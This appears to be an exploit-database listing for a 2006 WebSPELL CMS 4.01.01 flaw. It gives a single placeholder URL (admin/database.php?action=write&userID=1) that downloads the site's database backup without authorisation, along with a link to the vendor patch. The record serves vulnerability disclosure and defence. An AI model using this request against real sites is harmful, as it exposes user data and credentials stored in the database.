header-logo
Suggest Exploit
vendor:
Webspell CMS
by:
Trex
6,4
CVSS
MEDIUM
Accessible Database Backup Download
N/A
CWE
Product Name: Webspell CMS
Affected Version From: 4.01.01
Affected Version To: 4.01.01
Patch Exists: YES
Related CWE: N/A
CPE: a:webspell:webspell
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

WebSPELL <= 4.01.01 Accessible Database Backup Download Exploit

An attacker can download the database backup of the WebSPELL CMS by accessing the URL http://[SITE]/[PATH]/admin/database.php?action=write&userID=1

Mitigation:

The vendor has released a patch to address this vulnerability. The patch can be downloaded from http://cms.webspell.org/index.php?site=files&file=15
Source

Exploit-DB raw data:

# WebSPELL <= 4.01.01 Accessible Database Backup Download Exploit
# Discovered by: Trex
# Visit: www.SecuritySector.org / www.UnderGround.ag

# Exploit:
http://[SITE]/[PATH]/admin/database.php?action=write&userID=1

# Solution:
http://cms.webspell.org/index.php?site=files&file=15

# milw0rm.com [2006-09-12]

Navigation

Suggest Exploit

Services By CQR